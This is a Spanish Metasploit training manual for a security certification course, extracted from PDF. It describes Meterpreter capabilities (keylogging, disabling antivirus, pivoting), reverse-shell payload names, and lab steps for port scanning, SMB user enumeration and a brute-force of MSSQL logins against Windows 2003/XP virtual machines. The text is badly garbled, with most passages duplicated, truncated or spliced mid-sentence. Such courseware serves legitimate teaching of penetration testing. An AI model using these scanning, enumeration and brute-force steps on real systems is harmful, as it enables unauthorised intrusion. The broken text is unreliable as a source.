Migrar de procesos en el sistema victima

e los usuarios del sistema victima

Pivoting entre subredes en el sistema y/o red victima

Evita la creación de procesos en el sistema victima

Evita la creación de archivos en el disco duro del sistema victima

Es una herramienta que sirve tanto en el proceso de explotación, como en el de post

Se pueden usar múltiples canales de comunicación entre la víctima(Auditor) usando la misma conexión.

Acceso al sistema de archivos en el sistema victima

Ejecución de comandos en el sistema victima

Obtener información del sistema victima

Es un Payload estable y altamente flexible

Deshabilitar el software antivirus

Capturar trafico de red en el sistema victima

Y Mucho mas……………………

En la siguiente imagen podemos apreciar una Shell Meterpreter que se le ha dado al usuario atacante y/o auditor de seguridad, luego de que este ha realizado una intrusión exitosa sobre un sistema vulnerable con S.O Windows XP.

urso de seguridad, Metasploit Framework tiene muchos . Meterpreter se

define como una extensión de Metasploit, la cual permite aprovechar al máximo las umentar el alcance en lo que respecta a comprometer a

. También puede definirse como un Payload avanzado. Dentro de muchas de las funcionalidades y características que nos ofrece Meterpreter se

lo que graba las pulsaciones en el teclado) en el sistema

La comunicación entre el atacante (Auditor) victima (objetivo de evaluación) es cifrada

y el atacante y/o auditor.

Manipular el registro de Windows en el sistema victima (Acceso Lectura/Escritura)

de explotación, como en el de post-

víctima y el atacante

se le ha dado al usuario atacante y/o auditor de seguridad, luego de que este ha realizado una intrusión exitosa sobre

Page 10: Cpods training-metasploit

Certified Offensive and Defensive Security

Para usar la ayuda de meterpreter, basta con digitar el comando consola meterpreter. A medida que avanza el curso de seguridad, veremos procesos de auditorías de seguridad y teste de penetración. Meterpreter será una de las herramientas que más se usa en los procesos de explotaciinformática. Otros Payloads importantes que se deben manejar y conocer dentro del entorno de trabajo de Metasploit Framework: windows/vncinject/reverse_tcp

windows/shell/reverse_tcp

windows/shell_bind_tcp

Explotación básica con Metasploit Framework

explotación usando metasploit Framework, se hace necesario tener presente los siguientes conceptos y criterios:

• La explotación y la postseguridad ética (Hacking ético) y/o Test de penetración, por lo que antes de proceder al lanzar el primer proceso de explotación con Metasploit, el estudiante debe de manejar de forma completa las anteriores fases del HackingRecolección de información, Scanning de puertos, Enumeración y Scanning de vulnerabilidades.

• El proceso de explotación, se basa en una debilidad crítica identificada en las fases anteriores del Hacking Ético.

• La mayoría de procesos de explotación se embargo haremos uso en algunos procesos de explotación

• Para lanzar el primer exploit usando Metasploit Framework, se deben de tener en cuenta los conceptos que se mencionan a continuación, eexplotación básica.

• Tener en cuenta y como referencia los comandos de msfconsole, los cuales se pueden encontrar de forma completa en la siguiente Url: security.com/metasploit

Conceptos de explotación básica con Metasploit Framework: teniendo presente que metasploit contiene muchísimos módulos, exploit, auxiliares, payloads, entre otros, se dificun poco recordar cada uno de los módulos, por lo tanto es importante conocer y practicar sobre los siguientes comandos de la consola msfconsole, para facilitar así el uso de cada uno de los componentes que requeridos para los procesos de explotación:

Certified Offensive and Defensive Security Professional -CODSP Training

© www.dsteamseguridad.com

Para usar la ayuda de meterpreter, basta con digitar el comando help directamente des

A medida que avanza el curso de seguridad, veremos cómo utilizar Meterpreter en los de seguridad y teste de penetración. Meterpreter será una de las se usa en los procesos de explotación de este curso de seguridad

importantes que se deben manejar y conocer dentro del entorno de trabajo de

windows/vncinject/reverse_tcp

con Metasploit Framework: Para proceder a realizar el primer proceso de explotación usando metasploit Framework, se hace necesario tener presente los siguientes

La explotación y la post-explotación son las últimas fases de proceso seguridad ética (Hacking ético) y/o Test de penetración, por lo que antes de proceder al lanzar el primer proceso de explotación con Metasploit, el estudiante debe de manejar de forma completa las anteriores fases del Hacking Ético tales coRecolección de información, Scanning de puertos, Enumeración y Scanning de

El proceso de explotación, se basa en una debilidad crítica identificada en las fases anteriores del Hacking Ético.

La mayoría de procesos de explotación se realizan usando la consola msfconsole, sin embargo haremos uso en algunos procesos de explotación de la consola msfcli.

Para lanzar el primer exploit usando Metasploit Framework, se deben de tener en cuenta los conceptos que se mencionan a continuación, en lo que respecta a

Tener en cuenta y como referencia los comandos de msfconsole, los cuales se pueden encontrar de forma completa en la siguiente Url: http://www.offensivesecurity.com/metasploit-unleashed/Msfconsole_Commands

Conceptos de explotación básica con Metasploit Framework: teniendo presente que metasploit contiene muchísimos módulos, exploit, auxiliares, payloads, entre otros, se dificun poco recordar cada uno de los módulos, por lo tanto es importante conocer y practicar sobre los siguientes comandos de la consola msfconsole, para facilitar así el uso de cada uno de los componentes que requeridos para los procesos de explotación:

directamente desde la

utilizar Meterpreter en los de seguridad y teste de penetración. Meterpreter será una de las

ón de este curso de seguridad

importantes que se deben manejar y conocer dentro del entorno de trabajo de

Para proceder a realizar el primer proceso de explotación usando metasploit Framework, se hace necesario tener presente los siguientes

explotación son las últimas fases de proceso de auditoría de seguridad ética (Hacking ético) y/o Test de penetración, por lo que antes de proceder al lanzar el primer proceso de explotación con Metasploit, el estudiante debe de

Ético tales como: Recolección de información, Scanning de puertos, Enumeración y Scanning de

El proceso de explotación, se basa en una debilidad crítica identificada en las fases

realizan usando la consola msfconsole, sin de la consola msfcli.

Para lanzar el primer exploit usando Metasploit Framework, se deben de tener en n lo que respecta a

Tener en cuenta y como referencia los comandos de msfconsole, los cuales se pueden http://www.offensive-

Conceptos de explotación básica con Metasploit Framework: teniendo presente que metasploit contiene muchísimos módulos, exploit, auxiliares, payloads, entre otros, se dificulta un poco recordar cada uno de los módulos, por lo tanto es importante conocer y practicar sobre los siguientes comandos de la consola msfconsole, para facilitar así el uso de cada uno

Page 11: Cpods training-metasploit

Certified Offensive and Defensive Security

msf> show exploits: Este comando muestra todos los códigos de explotación que están disponibles en metasploit Framework (La cantidad de exploits depende de la fecha de actualización de metasploit). El anterior comando es de gran importancia, ya que cada ddescubren nuevas vulnerabilidades, y por consenciente se crean e integran nuevos códigos de explotación a metasploit framework. En la siguiente imagen se puede apreciar un ejemplo de la ejecución de este comando.

msf> show auxiliary: Los módulos tales como: Scanners de red, Scanners de servicios, fuzzers, entre otros. Por lo tanto la ejecución del comando en mención muestra en pantalla los módulos auxiliares disponibles para metasploit framework.actualización de metasploit)

Prácticas de Laboratorio:

Práctica de laboratorio numero 1

Objetivos: Ingresar y hacer usola msfconsole y la msfcli.

Recursos: VMWARE, Metasploit Framework y Backtrack 5

Ejecución de la práctica de laboratorio

Paso 1: Ingresar a Linux Backtrack, y abrir una shell de comandos (Terminal).usuario y passqord respectivamente pa

comandos digitar startx para entrar al modo grafico)

Certified Offensive and Defensive Security Professional -CODSP Training

© www.dsteamseguridad.com

Este comando muestra todos los códigos de explotación que están disponibles en metasploit Framework (La cantidad de exploits depende de la fecha de actualización de metasploit). El anterior comando es de gran importancia, ya que cada ddescubren nuevas vulnerabilidades, y por consenciente se crean e integran nuevos códigos de explotación a metasploit framework. En la siguiente imagen se puede apreciar un ejemplo de la ejecución de este comando.

Los módulos auxiliares en metasploit, tienen variedad de propósitos, tales como: Scanners de red, Scanners de servicios, fuzzers, entre otros. Por lo tanto la ejecución del comando en mención muestra en pantalla los módulos auxiliares disponibles

work. (La cantidad de módulos auxiliares depende de la fecha de

Prácticas de Laboratorio:

Práctica de laboratorio numero 1

: Ingresar y hacer uso de las diferentes consolas que ofrece Metasploit, tales como

: VMWARE, Metasploit Framework y Backtrack 5

de laboratorio 1:

: Ingresar a Linux Backtrack, y abrir una shell de comandos (Terminal).usuario y passqord respectivamente para Backtrack, es root y toor. Luego desde la shell de

para entrar al modo grafico)

Este comando muestra todos los códigos de explotación que están disponibles en metasploit Framework (La cantidad de exploits depende de la fecha de actualización de metasploit). El anterior comando es de gran importancia, ya que cada día se descubren nuevas vulnerabilidades, y por consenciente se crean e integran nuevos códigos de explotación a metasploit framework. En la siguiente imagen se puede apreciar un ejemplo de

auxiliares en metasploit, tienen variedad de propósitos, tales como: Scanners de red, Scanners de servicios, fuzzers, entre otros. Por lo tanto la ejecución del comando en mención muestra en pantalla los módulos auxiliares disponibles

(La cantidad de módulos auxiliares depende de la fecha de

Metasploit, tales como

: Ingresar a Linux Backtrack, y abrir una shell de comandos (Terminal). (Recordar que el

ra Backtrack, es root y toor. Luego desde la shell de

Page 12: Cpods training-metasploit

Certified Offensive and Defensive Security

Paso 2: abrir la consola msfconsole, lo cual se logra digitando el comando terminal de comandos de Linux Backtrack

Luego que se digite el comando

En la anterior imagen se puede apreciar que ya estamos dentro de la interface msfconsole. En el ingreso a la interface, el sistema nos indica la versión de metasploit, el número de exploiel número de módulos auxiliares, el Anotación: Para ingresar a la interface msfconsole, y a las otras interfaces metasploit, también lo podemos hacer por el entorno grafico.

Certified Offensive and Defensive Security Professional -CODSP Training

© www.dsteamseguridad.com

msfconsole, lo cual se logra digitando el comando msfconsole

terminal de comandos de Linux Backtrack

que se digite el comando msfconsole, debe de salir lo siguiente:

En la anterior imagen se puede apreciar que ya estamos dentro de la interface msfconsole. En el ingreso a la interface, el sistema nos indica la versión de metasploit, el número de exploiel número de módulos auxiliares, el número de PAYLOADS, entre otros.

Para ingresar a la interface msfconsole, y a las otras interfaces lo podemos hacer por el entorno grafico.

msfconsole desde la

En la anterior imagen se puede apreciar que ya estamos dentro de la interface msfconsole. En el ingreso a la interface, el sistema nos indica la versión de metasploit, el número de exploits,

Para ingresar a la interface msfconsole, y a las otras interfaces que nos ofrece

Page 13: Cpods training-metasploit

Certified Offensive and Defensive Security

Paso 3: digitar el comando msfconsole

Paso 4: salir de la interface msfconsole

Paso 5: Una vez que se tiene una es importante tener presenexploits, payloads, módulos desde una shell de msfconsole

O también puede hacerse de la interfimagen.

Certified Offensive and Defensive Security Professional -CODSP Training

© www.dsteamseguridad.com

msfconsole -h, para poder ver la ayuda de la interface msfconsole

msfconsole con el comando exit.

Una vez que se tiene una visión general sobre algunas de las interfaces de metasploit, presente que el software debe de quedar actualizado a los

auxiliares, entre otros. Para actualizar metasploit, simplemente msfconsole, digitamos el comando msfupdate.

O también puede hacerse de la interface grafica, tal y como se muestra en la siguiente

para poder ver la ayuda de la interface msfconsole

general sobre algunas de las interfaces de metasploit, que el software debe de quedar actualizado a los últimos

Para actualizar metasploit, simplemente

ace grafica, tal y como se muestra en la siguiente

Page 14: Cpods training-metasploit

Certified Offensive and Defensive Security

Anotación: Para efectos de este taller, ya se entrega Linux Backtrack con Metasploit actualizado al día. Lo anterior para fines de optimizar tiempos, ya que actualizar metasploit en el equipo e cada estudiante, puede tomar algún tiempo, según la velocidad del canal de Internet en donde se dicta el taller. Es altamente importante, que cuando actualicen metasploit en sus casas, configuren el bloqueador de scripts de firefox en sitio https://metque no presenten problemas al momento de actualizar metasploit.

Práctica de laboratorio numero 2

Objetivos: Verificar la conexiónalmacenando la información que respecta a procesos de scanning de puertos.

Certified Offensive and Defensive Security Professional -CODSP Training

© www.dsteamseguridad.com

: Para efectos de este taller, ya se entrega Linux Backtrack con Metasploit actualizado al día. Lo anterior para fines de optimizar tiempos, ya que actualizar metasploit en

e cada estudiante, puede tomar algún tiempo, según la velocidad del canal de Internet en donde se dicta el taller.

Es altamente importante, que cuando actualicen metasploit en sus casas, configuren el bloqueador de scripts de firefox en sitio https://metasploit.com, como un sitio seguro, para que no presenten problemas al momento de actualizar metasploit.

Práctica de laboratorio numero 2

conexión de Metasploit con un sistema de bases de daos, para ir de los host que se están evaluando a nivel de

que respecta a procesos de scanning de puertos.

: Para efectos de este taller, ya se entrega Linux Backtrack con Metasploit actualizado al día. Lo anterior para fines de optimizar tiempos, ya que actualizar metasploit en

e cada estudiante, puede tomar algún tiempo, según la velocidad del canal de

Es altamente importante, que cuando actualicen metasploit en sus casas, configuren el asploit.com, como un sitio seguro, para

de Metasploit con un sistema de bases de daos, para ir evaluando a nivel de seguridad, en lo

Page 15: Cpods training-metasploit

Certified Offensive and Defensive Security

Recursos: VMWARE, Metasploit Framework,

Observaciones: � Antes de proceder a realizar la práctica, verificar que

Windows 2003 Server están conectados en el mismo segmento de red, y que hay ping entre ambas maquinas.

� Es altamente importante tener conocimientos básicosservicios de red que se están evaluando y pmejor el trabajo de análisis de seguridad y/o penetration testing realizado.

Ejecución de la práctica de laboratorio 2:

Conexión con una base de datos y Scanning de Puertos

Paso 1: Ingresar a la interface

Anotación: En versiones anteriores de metasploit se hacía necesario configurar metasploit con una base de datos para poder plasmar de una manera más ordenada los resultados de las actividades que se iban ejecutando en el proceso de pruebas de penetraciúltima versión de metasploit solo soporta conexión para base PostgreSQL. Para poder ver el status de conexión de metasploit con la base de datos PostgreSQL se debe de digitar el siguiente comando: db_status

Paso 2: digitar el comando db_status,

base de datos llamada msf3dev Paso 3: digitar el comando db_nmap dirección IP Target (Windows Server 2003)

Paso 4: digitar el comando hosts

en la base de datos. Para el siguiente caso, se

Certified Offensive and Defensive Security Professional -CODSP Training

© www.dsteamseguridad.com

: VMWARE, Metasploit Framework, Windows Server y Backtrack 5

Antes de proceder a realizar la práctica, verificar que las maquinas Linux Backtrack y Windows 2003 Server están conectados en el mismo segmento de red, y que hay ping entre ambas maquinas. Es altamente importante tener conocimientos básicos-medios al respecto de los servicios de red que se están evaluando y próximamente atacando, para comprender mejor el trabajo de análisis de seguridad y/o penetration testing realizado.

Ejecución de la práctica de laboratorio 2:

con una base de datos y Scanning de Puertos

: Ingresar a la interface msfconsole

En versiones anteriores de metasploit se hacía necesario configurar metasploit con una base de datos para poder plasmar de una manera más ordenada los resultados de las actividades que se iban ejecutando en el proceso de pruebas de penetración. Actualmente la última versión de metasploit solo soporta conexión para base PostgreSQL. Para poder ver el status de conexión de metasploit con la base de datos PostgreSQL se debe de digitar el

db_status

db_status, para identificar que metasploit esté dev

: digitar el comando db_nmap dirección IP Target (Windows Server 2003)

hosts para ver los resultados de los host que se Para el siguiente caso, se tienen dos host.

las maquinas Linux Backtrack y Windows 2003 Server están conectados en el mismo segmento de red, y que hay ping

medios al respecto de los róximamente atacando, para comprender

mejor el trabajo de análisis de seguridad y/o penetration testing realizado.

En versiones anteriores de metasploit se hacía necesario configurar metasploit con una base de datos para poder plasmar de una manera más ordenada los resultados de las

ón. Actualmente la última versión de metasploit solo soporta conexión para base PostgreSQL. Para poder ver el status de conexión de metasploit con la base de datos PostgreSQL se debe de digitar el

conectado a una

: digitar el comando db_nmap dirección IP Target (Windows Server 2003)

tienen guardados

Page 16: Cpods training-metasploit

Certified Offensive and Defensive Security

Anotación: En ocasiones cuando el equipo de trabajo de un proceso de y/o penetration testing es representativo, y se hacen lugares distintos, es importante ejecutar nmap de firma directa y guardar los resultados en un archivo con algún formato en especial, por ejemplo en XML. Paso 5: realizar un scanning de puertos usando nmap, con la opción de exportar los resuldel scanning a un archivo del tipo XML.directamente a toda una subred.

Los resultados del anterior procesode metasploit. Paso 6: Una vez que se tienen algunos host registrados en la base de datos, con el comando services, se pueden identificar los servicios que están a la escucha en las maquinas victimas.

Certified Offensive and Defensive Security Professional -CODSP Training

© www.dsteamseguridad.com

ocasiones cuando el equipo de trabajo de un proceso de auditoríay/o penetration testing es representativo, y se hacen pruebas en diferentes

, es importante ejecutar nmap de firma directa y guardar los resultados en un formato en especial, por ejemplo en XML.

: realizar un scanning de puertos usando nmap, con la opción de exportar los resularchivo del tipo XML. El scanning de puertos se puede hacer a un solo host, o

directamente a toda una subred. Para el caso hacerlo sobre la maquina Windows 2003 Server.

resultados del anterior proceso de scanning, deberían de ser importados a la base de datos

: Una vez que se tienen algunos host registrados en la base de datos, con el comando , se pueden identificar los servicios que están a la escucha en las maquinas victimas.

auditoría de seguridad diferentes momentos y de

, es importante ejecutar nmap de firma directa y guardar los resultados en un

: realizar un scanning de puertos usando nmap, con la opción de exportar los resultados El scanning de puertos se puede hacer a un solo host, o

Para el caso hacerlo sobre la maquina Windows 2003 Server.

de ser importados a la base de datos

: Una vez que se tienen algunos host registrados en la base de datos, con el comando , se pueden identificar los servicios que están a la escucha en las maquinas victimas.

Page 17: Cpods training-metasploit

Certified Offensive and Defensive Security

Paso 7: realizar un proceso de Scanning de puertosestán dentro de metasploit. Para lograrlo primero debemos de hacer comando search de los módulospuertos, lo cual e logra con el siguiente comando:

Luego se obtiene los siguientes resultados:

Certified Offensive and Defensive Security Professional -CODSP Training

© www.dsteamseguridad.com

zar un proceso de Scanning de puertos usando los modulos auxiliares de nmapdentro de metasploit. Para lograrlo primero debemos de hacer una

módulos auxiliares de metasploit que tiene la funciónpuertos, lo cual e logra con el siguiente comando: search portscan

Luego se obtiene los siguientes resultados:

usando los modulos auxiliares de nmap que na búsqueda con el

función de scanning de

Page 18: Cpods training-metasploit

Certified Offensive and Defensive Security

Paso 8: Seleccionar el modulo seleccionarlo con el comandocomando: use auxiliary/scanner/portscan/syn

Dar el comando show options

trabajar.

Paso 9: Indicar las variables que se necesita para realizar el ssolo vamos a asignar valores a la variable RHOST que es la maquina targetvamos a realizar el scanning de puertos, y vamos a asignarle valores a la variable PORTS,corresponde a los puertos TCP queSegún lo anterior los comandos para asignar los set RHOST IP de Windows Server

set PORTS 25,53,80,110,135,139,445,1433,3389

Paso 9: El último paso es digitar ehay problemas, entonces de procede a ejecutar el modulo Auxiliar de scanning de puertos con el comando run

Certified Offensive and Defensive Security Professional -CODSP Training

© www.dsteamseguridad.com

el modulo auxiliar de scanning llamado auxiliary/scanner/portscan/syn

seleccionarlo con el comando use de metasploit, tal y como se muestra en el siguiente use auxiliary/scanner/portscan/syn

show options para ver las variables que necesita el modulo para poder

: Indicar las variables que se necesita para realizar el scanning de puertos, para el caso solo vamos a asignar valores a la variable RHOST que es la maquina target-victima, a la cual el vamos a realizar el scanning de puertos, y vamos a asignarle valores a la variable PORTS,corresponde a los puertos TCP que vamos a verificar si están abiertos, cerrados o filtrados.

comandos para asignar los valores para ambas variables son:

RHOST IP de Windows Server

PORTS 25,53,80,110,135,139,445,1433,3389

: El último paso es digitar el comando show options para ver que todo , entonces de procede a ejecutar el modulo Auxiliar de scanning de puertos con

auxiliary/scanner/portscan/syn y muestra en el siguiente

para ver las variables que necesita el modulo para poder

canning de puertos, para el caso victima, a la cual el

vamos a realizar el scanning de puertos, y vamos a asignarle valores a la variable PORTS, que abiertos, cerrados o filtrados.

valores para ambas variables son:

para ver que todo está bien, y si no , entonces de procede a ejecutar el modulo Auxiliar de scanning de puertos con

Page 19: Cpods training-metasploit

Certified Offensive and Defensive Security

Una vez que se ejecute el modulo auxiliar contra uno debe de salir los siguientes resultados cada target de cada segmento de red de las maquinas virtuales)

Ir más allá: Para usuarios más avanzados y/o experimentados con metasploit, que tal siejecutan el anterior comando, pero colocando un sniffer como wireshark de forma paralela al scanning de puertos, para capturar el tráfico y verificar el puertos del tipo SYN.

Práctica de laboratorio numero 3

Objetivos: Identificar y utilizarrealizar procesos de scanning de puertos para aplicaciones y/o protocolos específicosnivel TCP como para UDP.

Recursos: VMWARE, Metasploit Framework, 5

Observaciones:

� Antes de proceder a realizar la práctica, verificar que las maquinas Linux Backtrack y Windows 2003 Server están conectados en el mismo segmento de red, y que hay ping entre ambas maquinas.

� Es altamente importanteservicios de red que se mejor el trabajo de análisis

Ejecución de la práctica de laboratorio 3:

Paso 1: Trabajando con el Protocolo SMB:(Server Message Block Scanning), para lo cual se debe de seleccionar el modulo auxiliar auxiliary/scanner/smb/smb_version

secuencial lo siguiente:

Certified Offensive and Defensive Security Professional -CODSP Training

© www.dsteamseguridad.com

Una vez que se ejecute el modulo auxiliar contra uno de los targets (Objetivos de salir los siguientes resultados (Recordar que las direcciones IP varían de acuerdo a

cada target de cada segmento de red de las maquinas virtuales)

Para usuarios más avanzados y/o experimentados con metasploit, que tal siejecutan el anterior comando, pero colocando un sniffer como wireshark de forma paralela al scanning de puertos, para capturar el tráfico y verificar el tráfico de red para un scanning de

Práctica de laboratorio numero 3

y utilizar algunos de los módulos auxiliares que tiene Mrealizar procesos de scanning de puertos para aplicaciones y/o protocolos específicos

VMWARE, Metasploit Framework, Windows Server 2003, Windows XP

Antes de proceder a realizar la práctica, verificar que las maquinas Linux Backtrack y Windows 2003 Server están conectados en el mismo segmento de red, y que hay ping entre ambas maquinas.

te importante tener conocimientos básicos-medios al respecto de los servicios de red que se están evaluando y próximamente atacando, para comprender

análisis de seguridad y/o penetration testing realizado.

laboratorio 3:

Trabajando con el Protocolo SMB: Realizar un proceso de scanning del servicio SMB (Server Message Block Scanning), para lo cual se debe de seleccionar el modulo auxiliar auxiliary/scanner/smb/smb_version. Para poder usar este modulo, se debe realizar de forma

e los targets (Objetivos de evaluación), (Recordar que las direcciones IP varían de acuerdo a

Para usuarios más avanzados y/o experimentados con metasploit, que tal si ejecutan el anterior comando, pero colocando un sniffer como wireshark de forma paralela al

de red para un scanning de

auxiliares que tiene Metasploit para realizar procesos de scanning de puertos para aplicaciones y/o protocolos específicos, tanto a

, Windows XP y Backtrack

Antes de proceder a realizar la práctica, verificar que las maquinas Linux Backtrack y Windows 2003 Server están conectados en el mismo segmento de red, y que hay ping

medios al respecto de los atacando, para comprender

y/o penetration testing realizado.

Realizar un proceso de scanning del servicio SMB (Server Message Block Scanning), para lo cual se debe de seleccionar el modulo auxiliar

o, se debe realizar de forma

Page 20: Cpods training-metasploit

Certified Offensive and Defensive Security

� seleccionar el modulo auxiliar con el comando auxiliary/scanner/smb/smb_version

� Luego se debe de digitar el comando auxiliar

� Luego se le coloca la variasignar la dirección IP de Windows 2003 Server.

� De nuevo digitamos show options

con el comando exploit.

En la siguiente imagen encuentras de anteriormente.

� Si el exploit se ejecuta correctamente, deberá de mostrar algo similar a la siguiente

imagen, donde se puede apreciar el sistema análisis de seguridad), el dominio al que servidor

Certified Offensive and Defensive Security Professional -CODSP Training

© www.dsteamseguridad.com

seleccionar el modulo auxiliar con el comando auxiliary/scanner/smb/smb_version

Luego se debe de digitar el comando show options, para ver las opciones del modulo

Luego se le coloca la variable RHOSTS, que para el caso de este laboratorio, seria para asignar la dirección IP de Windows 2003 Server.

show options y si todo está bien, ejecutamos el módulos auxiliar exploit.

En la siguiente imagen encuentras de forma secuencial todos los pasos mencionados

se ejecuta correctamente, deberá de mostrar algo similar a la siguiente imagen, donde se puede apreciar el sistema operativo del target (Victima

d), el dominio al que está asociado la víctima, y el nombre del

seleccionar el modulo auxiliar con el comando use

, para ver las opciones del modulo

able RHOSTS, que para el caso de este laboratorio, seria para

y si todo está bien, ejecutamos el módulos auxiliar

forma secuencial todos los pasos mencionados

se ejecuta correctamente, deberá de mostrar algo similar a la siguiente del target (Victima -objetivo de

, y el nombre del

Page 21: Cpods training-metasploit

Certified Offensive and Defensive Security

Paso 2: Trabajando con el Protocolo SMB:grupos del nuestra víctima o target, que para el caso es Windows 2003 Serveusando el modulo auxiliar auxiliary/scanner/smb/smb_lookupsid

Para poder usar este modulo, se debe realizar de forma secuencial lo siguiente:

� use auxiliary/scanner/smb/smb_lookupsid

� show options

� set RHOSTS IP Windows Server

� exploit

En la siguiente imagen encuentras de forma secuencial todos los pasos mencionados anteriormente.

� Si el modulo auxiliar se ejecuta de forma correcta, deberemos tener los nombres de

usuarios y grupos que existen actualmente en el servidor Windows 2003 Server.

Certified Offensive and Defensive Security Professional -CODSP Training

© www.dsteamseguridad.com

Trabajando con el Protocolo SMB: Realizar un proceso de enumeracióno target, que para el caso es Windows 2003 Serve

auxiliar auxiliary/scanner/smb/smb_lookupsid.

Para poder usar este modulo, se debe realizar de forma secuencial lo siguiente:

use auxiliary/scanner/smb/smb_lookupsid

set RHOSTS IP Windows Server

nte imagen encuentras de forma secuencial todos los pasos mencionados

Si el modulo auxiliar se ejecuta de forma correcta, deberemos tener los nombres de usuarios y grupos que existen actualmente en el servidor Windows 2003 Server.

enumeración de usuarios y o target, que para el caso es Windows 2003 Server, lo cual se logra

Para poder usar este modulo, se debe realizar de forma secuencial lo siguiente:

nte imagen encuentras de forma secuencial todos los pasos mencionados

Si el modulo auxiliar se ejecuta de forma correcta, deberemos tener los nombres de usuarios y grupos que existen actualmente en el servidor Windows 2003 Server.

Page 22: Cpods training-metasploit

Certified Offensive and Defensive Security

Paso 3: Trabajando con el Protocolo SSH:del servidor SSH que se encuentra en el equipo Windows XP SP2seleccionando el modulo auxiliar de metasploit llamado auxiliary/scanner/ssh/ssh Para poder usar este modulo, se debe realizar de forma secuencial lo siguiente:

� use auxiliary/scanner/ssh/ssh_version

� show options

� set RHOSTS IP Windows XP SP2

� exploit

En la siguiente imagen encuentras de forma secuencial todos los pasos mencioanteriormente.

Paso 4: Trabajando con el Protocolo SNMP:que se tengan compartidos en la estación de trabajo Windows XP SP2, usando el protocolo simple de administración de red. Lo anterior se lometasploit llamado use auxiliary/scanner/snmp/snmp_enumshares

� use auxiliary/scanner/snmp/snmp_enumshares � show options � set RHOSTS 192.168.137.28� run

Certified Offensive and Defensive Security Professional -CODSP Training

© www.dsteamseguridad.com

Trabajando con el Protocolo SSH: Realizar un proceso de identificación de la versión del servidor SSH que se encuentra en el equipo Windows XP SP2. Lo anterior se logra seleccionando el modulo auxiliar de metasploit llamado auxiliary/scanner/ssh/ssh

Para poder usar este modulo, se debe realizar de forma secuencial lo siguiente:

use auxiliary/scanner/ssh/ssh_version

set RHOSTS IP Windows XP SP2

En la siguiente imagen encuentras de forma secuencial todos los pasos mencio

Trabajando con el Protocolo SNMP: Realizar un proceso de identificación de recursos que se tengan compartidos en la estación de trabajo Windows XP SP2, usando el protocolo simple de administración de red. Lo anterior se logra seleccionando el modulo auxiliar de metasploit llamado use auxiliary/scanner/snmp/snmp_enumshares

use auxiliary/scanner/snmp/snmp_enumshares

set RHOSTS 192.168.137.28

Realizar un proceso de identificación de la versión Lo anterior se logra

seleccionando el modulo auxiliar de metasploit llamado auxiliary/scanner/ssh/ssh_version

Para poder usar este modulo, se debe realizar de forma secuencial lo siguiente:

En la siguiente imagen encuentras de forma secuencial todos los pasos mencionados

Realizar un proceso de identificación de recursos que se tengan compartidos en la estación de trabajo Windows XP SP2, usando el protocolo

gra seleccionando el modulo auxiliar de

Page 23: Cpods training-metasploit

Certified Offensive and Defensive Security

En la siguiente imagen encuentras de forma secuencial todos los anteriormente.

Anotación: Y de forma similar existen muchísimos más módulos auxiliaresde puertos y aplicaciones, los cuales evalúan otros protocolos tales como FTP, MSSQL, SNMP, entre otros.

Práctica de laboratorio numero 4

Objetivos: Identificar y utilizar algunos de los módulos auxiliares que tiene Metasploit para realizar procesos de análisis de vulnerabilidades para aplicaciones y/o protocolos específicos, tanto a nivel TCP como para U

Recursos: VMWARE, Metasploit Framework, Windows Server 2003, Windows XP y Backtrack 5

Observaciones:

� Antes de proceder a realizar la práctica, verificar que las maquinas Linux Backtrack y Windows 2003 Server están conectados en el mismo segmento dentre ambas maquinas.

� Es altamente importante tener conocimientos básicos

Certified Offensive and Defensive Security Professional -CODSP Training

© www.dsteamseguridad.com

En la siguiente imagen encuentras de forma secuencial todos los pasos mencionados

Y de forma similar existen muchísimos más módulos auxiliares a nivel de scanners los cuales evalúan otros protocolos tales como FTP, MSSQL, SNMP,

Práctica de laboratorio numero 4

: Identificar y utilizar algunos de los módulos auxiliares que tiene Metasploit para realizar procesos de análisis de vulnerabilidades para aplicaciones y/o protocolos específicos, tanto a nivel TCP como para UDP.

VMWARE, Metasploit Framework, Windows Server 2003, Windows XP y Backtrack

Antes de proceder a realizar la práctica, verificar que las maquinas Linux Backtrack y Windows 2003 Server están conectados en el mismo segmento de red, y que hay ping entre ambas maquinas. Es altamente importante tener conocimientos básicos-medios al respecto de los

pasos mencionados

a nivel de scanners los cuales evalúan otros protocolos tales como FTP, MSSQL, SNMP,

: Identificar y utilizar algunos de los módulos auxiliares que tiene Metasploit para realizar procesos de análisis de vulnerabilidades para aplicaciones y/o protocolos específicos,

VMWARE, Metasploit Framework, Windows Server 2003, Windows XP y Backtrack

Antes de proceder a realizar la práctica, verificar que las maquinas Linux Backtrack y e red, y que hay ping

medios al respecto de los

Page 24: Cpods training-metasploit

Certified Offensive and Defensive Security

servicios de red que se están evaluando y próximamente atacando, para comprender mejor el trabajo de análisis de seguridad y/o penetra

� Como actividad complementaria se demora actualizando los pluginstalado en la maquina Windows XP

Anotación: Es altamente recomenServer, lo investigue por cuenta propia con el fin de mejorar los conocimientos relacionados con auditorias de sistemas intrusivas del tipo Penetration Testing, ya que durante la siguiente practica de laboratorio, va a comprometer a SQL Server, en lo que respecta a violentar la seguridad del motor de bases de datos, y del sistema operativo que lo contiene..

Ejecución de la práctica de laboratorio 4:

Paso 1: Scanning de Puertos y version del puerto T

de scanning de puertos realizados en laboratorios pasados, se puede observar que el puerto 1433 TCP está en estado Listening (Abierto), esperando conexiones, proceso de scanning de puertosapreciar que el servicio y versión2005 SP1. Proceder a realizar el scanning de puertos, imagen.

Paso 2: Identificación de vulnerabilidades

proceso de identificación de vulnerabilidadesel login y password del usuario SQL SERVER. Para lograr identificar débiles, podemos usar el siguientauxiliary/scanner/mssql/mssql_login

Para poder usar este modulo, se de

� use auxiliary/scanner/mssql/mssql_login

� show options

� set PASS_FILE /pentest/passwords/john/password.lst

� set RHOSTS 192.168.137.28 (Aquí colocas la dirección IP de Servidor Windows)

� set VERBOSE false

� show options

� exploit

Certified Offensive and Defensive Security Professional -CODSP Training

© www.dsteamseguridad.com

servicios de red que se están evaluando y próximamente atacando, para comprender mejor el trabajo de análisis de seguridad y/o penetration testing realizado.Como actividad complementaria y para evitar todo el tiempo que la aplicación nessus se demora actualizando los plug-in, se puede usar el software nessus que esta instalado en la maquina Windows XP

Es altamente recomendable que si el estudiante no conoce como trabaja MSSQL Server, lo investigue por cuenta propia con el fin de mejorar los conocimientos relacionados con auditorias de sistemas intrusivas del tipo Penetration Testing, ya que durante la siguiente

laboratorio, va a comprometer a SQL Server, en lo que respecta a violentar la seguridad del motor de bases de datos, y del sistema operativo que lo contiene..

Ejecución de la práctica de laboratorio 4:

